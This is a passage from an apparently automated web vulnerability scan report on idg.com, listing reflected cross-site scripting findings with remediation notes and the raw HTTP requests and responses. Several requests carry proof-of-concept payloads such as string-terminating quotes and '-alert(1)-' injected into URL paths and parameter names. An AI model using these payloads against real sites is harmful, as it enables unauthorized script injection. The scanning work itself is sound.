Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www36e57";024fc10ff1c/HomeNew.nsf/docs/idc");
} catch(err) {}</script>
...[SNIP]...

2.143. http://idg.com/www/HomeNew.nsf/docs/idc [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idc

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 116af"%3b1f71a9ba6af was submitted in the REST URL parameter 3. This input was echoed as 116af";1f71a9ba6af in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs116af"%3b1f71a9ba6af/idc HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:43 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs116af";1f71a9ba6af/idc");
} catch(err) {}</script>
...[SNIP]...

2.144. http://idg.com/www/HomeNew.nsf/docs/idc [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idc

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 359bd"%3bc32d7581091 was submitted in the REST URL parameter 4. This input was echoed as 359bd";c32d7581091 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/idc359bd"%3bc32d7581091 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:44 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idc359bd";c32d7581091");
} catch(err) {}</script>
...[SNIP]...

2.145. http://idg.com/www/HomeNew.nsf/docs/idc [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idc

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ae8e"-alert(1)-"283f308e868 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/idc?2ae8e"-alert(1)-"283f308e868=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5025
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idc?2ae8e"-alert(1)-"283f308e868=1");
} catch(err) {}</script>
...[SNIP]...

2.146. http://idg.com/www/HomeNew.nsf/docs/idg_executives [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_executives

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed326"%3b904e4d03b9 was submitted in the REST URL parameter 1. This input was echoed as ed326";904e4d03b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwed326"%3b904e4d03b9/HomeNew.nsf/docs/idg_executives HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:44 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5022
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwed326";904e4d03b9/HomeNew.nsf/docs/idg_executives");
} catch(err) {}</script>
...[SNIP]...

2.147. http://idg.com/www/HomeNew.nsf/docs/idg_executives [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_executives

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d561"%3b6455cc6564d was submitted in the REST URL parameter 3. This input was echoed as 3d561";6455cc6564d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs3d561"%3b6455cc6564d/idg_executives HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:45 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5023
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs3d561";6455cc6564d/idg_executives");
} catch(err) {}</script>
...[SNIP]...

2.148. http://idg.com/www/HomeNew.nsf/docs/idg_executives [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_executives

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e552"%3b216bed3b756 was submitted in the REST URL parameter 4. This input was echoed as 3e552";216bed3b756 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/idg_executives3e552"%3b216bed3b756 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5023
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idg_executives3e552";216bed3b756");
} catch(err) {}</script>
...[SNIP]...

2.149. http://idg.com/www/HomeNew.nsf/docs/idg_executives [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_executives

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e2af"-alert(1)-"0a5722af41d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/idg_executives?1e2af"-alert(1)-"0a5722af41d=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:43 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5036
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idg_executives?1e2af"-alert(1)-"0a5722af41d=1");
} catch(err) {}</script>
...[SNIP]...

2.150. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_privacy_policy

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e22a"%3bd456b889b9 was submitted in the REST URL parameter 1. This input was echoed as 8e22a";d456b889b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www8e22a"%3bd456b889b9/HomeNew.nsf/docs/idg_privacy_policy HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www8e22a";d456b889b9/HomeNew.nsf/docs/idg_privacy_policy");
} catch(err) {}</script>
...[SNIP]...

2.151. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_privacy_policy

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff749"%3be32ec39d933 was submitted in the REST URL parameter 3. This input was echoed as ff749";e32ec39d933 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docsff749"%3be32ec39d933/idg_privacy_policy HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docsff749";e32ec39d933/idg_privacy_policy");
} catch(err) {}</script>
...[SNIP]...

2.152. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_privacy_policy

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d638"%3bc7eb102dcb6 was submitted in the REST URL parameter 4. This input was echoed as 9d638";c7eb102dcb6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/idg_privacy_policy9d638"%3bc7eb102dcb6 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:03 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idg_privacy_policy9d638";c7eb102dcb6");
} catch(err) {}</script>
...[SNIP]...

2.153. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idg_privacy_policy

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2605f"-alert(1)-"fae0f9d2f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/idg_privacy_policy?2605f"-alert(1)-"fae0f9d2f09=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5040
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/idg_privacy_policy?2605f"-alert(1)-"fae0f9d2f09=1");
} catch(err) {}</script>
...[SNIP]...

2.154. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/intl_media_contacts

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2ba2"%3bf9d8deefc6f was submitted in the REST URL parameter 1. This input was echoed as c2ba2";f9d8deefc6f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwc2ba2"%3bf9d8deefc6f/HomeNew.nsf/docs/intl_media_contacts HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5028
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwc2ba2";f9d8deefc6f/HomeNew.nsf/docs/intl_media_contacts");
} catch(err) {}</script>
...[SNIP]...

2.155. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/intl_media_contacts

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b835"%3b5a981b27a8 was submitted in the REST URL parameter 3. This input was echoed as 7b835";5a981b27a8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs7b835"%3b5a981b27a8/intl_media_contacts HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:00 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs7b835";5a981b27a8/intl_media_contacts");
} catch(err) {}</script>
...[SNIP]...

2.156. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/intl_media_contacts

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc268"%3b237152f115b was submitted in the REST URL parameter 4. This input was echoed as bc268";237152f115b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/intl_media_contactsbc268"%3b237152f115b HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:04 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5028
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/intl_media_contactsbc268";237152f115b");
} catch(err) {}</script>
...[SNIP]...

2.157. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/intl_media_contacts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7654"-alert(1)-"8faa41383a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/intl_media_contacts?c7654"-alert(1)-"8faa41383a4=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5041
Cache-control: no-cache

